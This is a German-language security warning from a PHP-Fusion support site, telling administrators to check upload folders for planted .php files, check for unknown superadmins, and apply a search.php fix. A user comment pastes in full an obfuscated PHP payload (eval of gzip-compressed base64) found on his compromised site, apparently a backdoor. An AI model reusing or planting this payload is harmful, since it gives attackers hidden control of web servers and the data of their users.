Mehr Lesen...

PHP-Fusion v6/v7 Sicherheitswarnung

Überprüft zuerst Eure Verzeichnisse downloads / attachments /forum attachments / avatars / db-backups auf .php Dateien und löscht diese.
Grundsätzlich muss jeder Ordner chmodded 777 sein, um Benutzern zu erlauben, Dateien hochzu laden. Bitte chmodded diese vorsichtshalber zurück auf 755 oder noch sicherer 644.
Ausserdem solltet Ihr Eure Liste von Superadmins überprüfen, ob sich dort vielleicht ein unbekannter SA dabei ist.

Zur Zeit wird an einem Fix gearbeitet und es wurde eine Sicherheitslücke in der search.php gefunden.
Ihr solltet diese umgehend löschen !

Informiert Euch weiterhin auf unserer oder der Englichen Support Seite nach Neuigkeiten.

Überprüft zusätzlich Euren HTML Code und Footer Bereich, wie es scheint können durch die Sicherheitslücke URL Adressen im Footer oder anderen Bereichen eingefügt werden.

EDIT: Wir empfehlen dringend die CHMOD auf 644 bei den Avataren und bei den Forum Anhängen zu setzen.

SICHERHEITS-UPDATE FÜR PHP-FUSION 7 VERFÜGBAR: Ab sofort könnt ihr ein Update für die v7 herunterladen, das die Sicherheitslücke der search.php schliesst. PHP-Fusion 7.00.1 Update - for 7.00 only

Euer PHPFusion-SupportClub Team

 Kommentare 

#1 | turbo-opa , 15. November 2008 um 07:42:27

Code 

<?php eval(gzuncompress(base64_decode('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'))); ?>

so sieht dann eine php aus die nicht da rein gehört. habe aber jetzt alles gesichert gruß uwe

 Kommentar schreiben 

Bitte logge dich ein, um einen Kommentar zu verfassen.

 Bewertungen 

Bewertungen sind nur für Mitglieder verfügbar.
Bitte anmelden oder registrieren um zu Bewerten.

Es wurden keine Bewertungen veröffentlicht.
HarlekinPower